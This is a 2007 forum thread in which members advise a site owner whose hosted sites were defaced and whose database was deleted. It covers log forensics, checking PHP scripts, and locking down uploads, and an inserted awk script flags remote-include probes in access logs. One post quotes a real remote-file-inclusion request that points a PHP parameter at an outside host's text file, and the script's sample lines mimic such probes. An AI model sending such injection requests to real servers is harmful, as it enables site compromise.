pls help, my sites are hacked

Discussion in 'Security' started by tigergb, Nov 18, 2007.

  1. #1
    All of my sites hosted at DreamHost were hacked today by Www.AvciHack.Com; they changed my main pages and deleted my database.
    I changed my FTP password but it is useless. Plus, there is no visible strange file on my server either.

    could anyone give me some advice how to deal with this?

    thanks a lot for your help.
     
    tigergb, Nov 18, 2007 IP
  2. goscript

    goscript Prominent Member

    #2
    What script were you using?
     
    goscript, Nov 18, 2007 IP
  3. tigergb

    tigergb Active Member

    #3
    different scripts, some sites are static html.
     
    tigergb, Nov 18, 2007 IP
  4. InFloW

    InFloW Peon

    #4
    Sounds like one of your PHP scripts got exploited. Make sure everything is up to date otherwise bots are going to exploit your sites time and time again.
     
    InFloW, Nov 18, 2007 IP
  5. wisdomtool

    wisdomtool Moderator Staff

    #5
    Get a security company to check what actually happened and patch it before it is too late (if it is not too late).
     
    wisdomtool, Nov 18, 2007 IP
  6. calum

    calum Peon

    #6
    What are the names and versions of the scripts you are using?

    Some might have security vulnerabilities.
     
    calum, Nov 18, 2007 IP
  7. lordofthemorning

    lordofthemorning Well-Known Member

    #7
    PHP exploits have been a pain in the butt for me! Lost a valuable database to them last year. Now I back up every other day.

    I found WordPress has been an open door for hackers. They always change the config file and the index file.
     
    lordofthemorning, Nov 18, 2007 IP
  8. tigergb

    tigergb Active Member

    #8
    one of my sites uses "software index script", not sure whether it is the reason.
     
    tigergb, Nov 18, 2007 IP
  9. deltrumweb

    deltrumweb Banned

    #9
    This is most probably a PHP exploit... I fell foul of a WordPress hack when I was using the auto RSS import script. The script imported a load of trojans, which meant that every visitor to the site got a trojan. Received a complaint from the DC and had to close the account whilst I removed the offending script!
     
    deltrumweb, Nov 23, 2007 IP
  10. hans

    hans Well-Known Member

    #10
    Have a look at the procedure there
    http://forums.digitalpoint.com/showthread.php?t=547049
    same is valid for you as well
    1.
    you really have to FIND the exact "door" of entry = vulnerability - hence you have to do access_log forensic research,
    by using grep/zgrep
    or by visual search of raw log lines
    no matter the size of log

    2.
    wisdomtool's advice may be good but also may cost you thousands of $ ...
    if you had that amount you most likely would have invested such amount in a network/cyber security workshop - these too are in the range of multi k$ for a few days.
    since you did NOT - i assume you have NO such $
    hence you have to sit down and do all on your own
    possible=successful = just a matter of time and by the end you will feel better because you start to understand your own site / scripts

    see also one of my most recent blog articles at
    http://www.kriyayoga.com/love_blog/post.php/891

    you search for unusual log entries like one of today's most recent hacker attempts

    84.246.4.133 - - [24/Nov/2007:08:09:15 +0800] "GET /love_blog/zboard//include/write.php?dir=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803"

    hence you look among MANY other things for requests of existing or NON-existing URLs by automated scripts, attempts to UPLOAD/inject like in above example

    you may also look in a separate run - using grep/zgrep in your access_log / error_log files for user agent

    zgrep "libwww-perl" access_log-2007*.gz >>libwww-perl.txt

    adapt above bash line with your own exact access_log file name
    this writes output of grep / zgrep into file libwww-perl.txt

    this is but one of many ways hackers try to get into your "panty" :) !! but this is a very frequent way and apparently fully automated using a variety of known vulnerabilities across the planet. hence you find such GET requests for files you may never have had - but you also may find some of the SW/scripts you have ...

    calum's question is good
    but now you have to Google for
    every

    "script_name_you_have security alert"

    use above 3 keywords for G search BUT without quotes !!
    then you may find known and published security issues about any of your installed scripts

    you also may run a FULL nessus scan on your server - that only works if you have your OWN server - this again would show you possible KNOWN vulnerabilities on your server/site

    reformatting/reinstalling IS NO solution - hours or days all will be as is NOW !!
    you HAVE to search AND FIND !! no matter the time / efforts involved
    remember as a criterion of motivation
    the hackers did EXACTLY the same on your site - search and find - what "strangers" can do - the owner needs to be able to do even faster, better and more efficiently !!!

    meanwhile

    you may at least
    disable any password login
    chmod 000 any and ALL URL-paths into login areas AND upload scripts
    DISABLE any and every upload of ANY kind of file !! txt, jpg, gif or whatever !!!!!!!
     
    hans, Nov 24, 2007 IP
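
The access_log search described in post #10, as an added example that is not part of any post in this thread. It generalises the single `zgrep` for one user agent: it flags every request whose query string carries a URL as a parameter value (the shape of the log line quoted above) and reports the status the server returned. Function names are hypothetical, the sample lines are constructed, and the combined log format is assumed.

```shell
#!/usr/bin/env bash
# Added example: triage access logs for remote-include probes (not from the thread).

# Constructed sample lines in combined log format; addresses and hosts are
# documentation placeholders, not real indicators.
sample_log() {
  cat <<'EOF'
192.0.2.10 - - [24/Nov/2007:08:09:15 +0800] "GET /board/include/write.php?dir=http://host.example/id.txt? HTTP/1.1" 403 1014 "-" "libwww-perl/5.803"
198.51.100.7 - - [24/Nov/2007:08:11:02 +0800] "GET /index.php?page=http://host.example/id.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.803"
203.0.113.5 - - [24/Nov/2007:08:12:40 +0800] "GET /article.php?id=42 HTTP/1.1" 200 8301 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Nov/2007:08:13:09 +0800] "GET /gallery/view.php?file=HTTP%3A%2F%2Fhost.example%2Fid.txt HTTP/1.1" 404 512 "-" "libwww-perl/5.803"
EOF
}

# Read the named logs (gzip-compressed if *.gz), or stdin when none are given.
read_logs() {
  if [ "$#" -eq 0 ]; then cat; return; fi
  for f in "$@"; do
    case "$f" in
      *.gz) gzip -dc -- "$f" ;;
      *)    cat -- "$f" ;;
    esac
  done
}

# Print "STATUS CLIENT_IP PATH" for each request whose query string has a
# parameter value that is itself a URL, plain or percent-encoded.
rfi_triage() {
  read_logs "$@" | awk '
    BEGIN { FS = "\"" }              # field 2 = request line, field 3 = status and size
    {
      if (split($2, req, " ") < 2) next          # malformed request line
      uri = tolower(req[2])
      if (uri !~ /[?&][^=&]*=(https?|ftp)(:\/\/|%3a%2f%2f)/) next
      split($1, pre, " ")            # pre[1]  = client address
      split($3, post, " ")           # post[1] = HTTP status
      path = req[2]; sub(/\?.*/, "", path)
      print post[1], pre[1], path
    }'
}

# Probes answered with 2xx: the target script ran, so inspect it first.
served_probes() { rfi_triage "$@" | awk '$1 ~ /^2/'; }

# Run "script --demo" to see the triage of the constructed sample.
if [ "${1:-}" = "--demo" ]; then sample_log | rfi_triage; fi
```

A 2xx status only shows that the requested script answered; that script and its version are what to check next, while 403 and 404 entries are probes the server turned away.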
  11. simran

    simran Banned

    #11
    Best way .. go and contact dreamhost staff ... as they can tell u what exactly happened ..
     
    simran, Nov 27, 2007 IP
  12. hans

    hans Well-Known Member

    #12
    it is very unlikely that the host has time/money and resources to do the site owner's job.
    typically the host controls server - server is the least danger to get hacked
    site owner in charge of all his installed SW = here is the greatest and typically the only danger to get hacked
    host would need to know all your SW/scripts which is very unlikely

    but the host may eventually assist you in giving access to ALL various log files needed to do all the forensic research needed - as outlined in the posts a.m. to find your entry point and to thus secure your site.
     
    hans, Nov 27, 2007 IP